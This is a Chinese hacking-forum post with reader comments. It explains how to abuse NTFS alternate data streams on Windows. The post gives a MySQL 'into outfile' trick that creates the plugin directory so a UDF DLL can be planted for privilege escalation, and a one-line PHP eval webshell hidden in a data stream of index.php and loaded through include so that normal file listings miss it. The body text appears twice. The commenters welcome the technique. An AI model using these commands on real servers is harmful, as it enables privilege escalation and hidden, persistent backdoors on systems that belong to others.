Win下MySQL提权时无法创建目录解决办法及数据流隐藏Webshell
这个其实是NTFS惹的祸。NTFS中的ADS(交换数据流)可以建立目录,隐藏webshell等等。
0x01 Mysql创建目录
当MySQL版本较高时,自定义函数的dll需要放在mysql目录下的lib\plugin\。一般普通的脚本是没有在这个文件夹下创建文件夹的权限的。这里可以用到ads来突破:会在mysql目录下生成一个lib目录,这样你就可以将你的udf放在这个插件目录下了。
0x02 隐藏webshell
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:这样子就生成了一个不可见的shell a.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个a.jpg的。我们可以在另外一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:a.jpg’)?>,这样子就可以正常解析我们的一句话了。
其他ads的利用各位可以参考互联网。
0x01 Mysql创建目录
当MySQL版本较高时,自定义函数的dll需要放在mysql目录下的lib\plugin\。一般普通的脚本是没有在这个文件夹下创建文件夹的权限的。这里可以用到ads来突破:
select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION';
0x02 隐藏webshell
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval(request[xxx])?^> > index.php:a.jpg
其他ads的利用各位可以参考互联网。
评论9次
好像今天微信推送了下?不过貌似是我12年写的,http://zone.wooyun.org/content/1064 居然木有版权。
的确学xi了,之前用ntfs建立不了文件夹就只看运气了--☞直接访问mysql的目录,如果有权限的话自己用菜刀来创建文件夹!现在有了楼主的思路,真是解决了不少问题
前两年,有一个站被人整得死去活来的,就是找不到马子在那,一直不知道有这种方法,我草
学xi下 不错啊
ntfs数据流隐藏
这个玩意 权限需要很大。。
神法,从来没试过
@debug ==。我没找到,所以就发了
以前别人发过。